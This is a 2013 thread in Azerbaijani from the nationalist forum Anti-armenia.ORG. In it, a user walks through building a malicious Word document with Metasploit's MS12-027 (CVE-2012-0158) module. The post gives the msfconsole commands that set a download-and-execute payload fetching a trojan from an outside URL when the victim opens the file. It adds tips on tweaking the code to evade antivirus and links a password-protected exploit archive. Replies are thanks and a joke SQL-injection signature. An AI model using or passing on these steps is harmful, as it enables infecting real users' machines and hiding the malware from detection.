Anti-armenia.ORG - Forumlar - Microsoft CVE-2012-0158 (MS12-027) exploit



Istifadəçi
    2013-04-14 06:25 GMT                 

StealtH



Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


Ətraflı buradan oxuya bilərsiz
http://technet.microsoft.com/tr-tr/security/bulletin/ms12-027 türkcə
http://technet.microsoft.com/ru-ru/security/bulletin/ms12-027 rusca

Qısaca deyim ki bu çox təhlükəli bir exploitdir. Bunun vasitəsilə .doc uzantılı fayldan downloader etmək olur
Yəniki hər kimsə bu .doc (Microsoft Word) uzantılı faylı açsa onda bizim indi qeyd edəcəyimiz troy kompa yüklenib və sonra run olacaq
Bu 2003 və 2007 versiyaları üçün aktualdı, (əgər update olunmayıbsa )
Faylımızı compile etmək üçün əvvəlcə Metasploit Version 4.5.3 for Linux 32-Bit yükləyək http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
Mən lunix versiyasını ona görə götürdümkü məndə windowsda nəsə install etmək alınmadı
Mən yükləmə qaydasını lunix üçün göstərəcəm

Kod:
sudo /home/stealth/metasploit-latest-linux-installer.run


sudo Metasploiti admin hüquqları ilə install edir
installdan sonra terminalı açırıq və bu komandanı veririk

Kod:
sudo msfconsole
use exploit/windows/fileformat/ms12_027_mscomctl_bof
set PAYLOAD windows/download_exec
set URL http://site.az/html/TROJ.exe
set FILENAME TROJ.doc
set EXE update.exe
exploit


yuxarıda qeyd etdiyim qovluğu açıb oradakı troi.doc faylını götürürük
user bu faylı açan kimi http://site.az/html/TROJ.exe dakı troyan kompa yüklənir və sonra run olunur
düzdür aldığımız fayl demək olarki bütün av tərəfindən tutulur , ancaq koda bir az əl gəzdirdikdən sonra görəcəksinizki axırda demək olarkı bir fud olur
bir az "zibil" kodda dəyişiklik etsəz avlərdən gizlədə bilərsiz
bu arxivdə cryptdən əvvəl və cryptdən sonra olan versiyalar var
yükləyin və source koda baxın özüvüz iki kodu müqaisə edib görəcəksiniz fərqi

http://ge.tt/9OtRD0e/v/0?c
http://www.boxca.com/79uaa315yw6e/EXPLOIT.rar.html
pass ergenekon

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG
    

Istifadəçi
    2013-04-14 10:20 GMT                 

Qetl-i-yan



İstifadəçi
Mesaj Sayı : 80
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   4  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : #Op. Qetl-i-yan
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər
+Rep

Bəzən oz-ozümə soruşuram
Hack_Mənim.nəyim?me=-1+union+all+select+1,null,1+from+Qətl-i-Yan
Sonra yenə ozümə deyirəm ki,
Delete from hack where groupby='Qətl-i-Yan'
Son olaraq mənə qalan
Md5(md5($xəyal).md5($Crack-liyi))
Anti-armenia.ORG
    

Istifadəçi
    2013-04-14 18:00 GMT                 

M4NY3T!K



Gold
Mesaj Sayı : 606
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   7  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Naxçıvan
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Konkret Əladı

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2013-04-15 06:25 GMT                 

StealtH



Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


dəyməz buyurun )

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG